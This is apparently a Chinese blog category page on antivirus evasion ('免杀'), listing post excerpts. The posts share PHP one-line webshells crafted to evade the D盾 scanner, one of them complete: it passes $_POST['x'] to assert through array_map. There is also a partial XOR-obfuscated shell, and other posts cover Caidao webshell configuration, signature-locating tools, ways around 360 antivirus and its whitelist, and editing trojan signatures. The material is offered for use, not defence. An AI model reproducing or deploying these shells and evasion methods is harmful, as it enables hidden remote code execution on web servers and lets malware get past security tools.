免杀

黑客(Hacker)广义上指在计算机科学,编程以及设计领域有高度理解力的人。

异或免杀D盾PHP一句话

异或免杀D盾PHP一句话

之前给的过D盾一句话webshell现在都已被查杀,补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1='C'^"\x30"; $_2='A'^"\x32"; $...

再丢个过D盾免杀PHP一句话木马

再丢个过D盾免杀PHP一句话木马

前几天给的那个已经进套餐,今天再扔个免杀过D盾的 <?php function today($a, $b) { array_map($a, $b); } today(assert, array($_POST['x'])); ?>

过D盾Shell新思路分析

过D盾Shell新思路分析

在先知上看到了一个shell过D盾的思路,同样可用来过其它waf。 D盾扫描结果 以前的思路常规,就是定义一个变量b:$b='';为空,$b = null;,$b = "\n";然后变量a: $a = $_GET['1'];,eval($a.$b);...

caidao.conf参数表,菜刀配置详解

新版菜刀更新了后,配置项增加了更多可自定义值,现在它更锋利了,就和以前的鸽子一样,配置文件免杀后,可能你的SHELL就过了! <FLAG> 返回的内容分隔...

VirTest5.0特征码定位器(开源)

VirTest5.0特征码定位器(开源)

以前向无花果大婶要的一份源代码,未经过他老人家的允许,特此斗胆献给大家。 目前比较常有名气的特征码定位器主要有CCL与MYCCL,他们都采用文件分块定位的办法,定位效果带有运气成份,且可能每次定位出的位置都...

对抗360定位干扰

对抗360定位干扰

因为之前需要,就顺手写了个,Delphi源代码给大家,大家可以拿去参考,至于防干扰。现在有用么用已经不晓得了!! 批量改名防干扰

360白名单

360白名单文件在哪、360白名单分析 最近,在学习免杀这方面的知识。方便以后写壳。但是,360的云查杀。总是认为我的壳是病毒,真心蛋疼 于是,添加到了白名单...

汇编免杀基础知识

木马免杀需要用到的基础反汇编知识木马高级免杀修改特征码需要熟练掌握的全部汇编知识 一.机械码,又称机器码. ultraedit打开,编辑exe文件时你会看到 许许多多...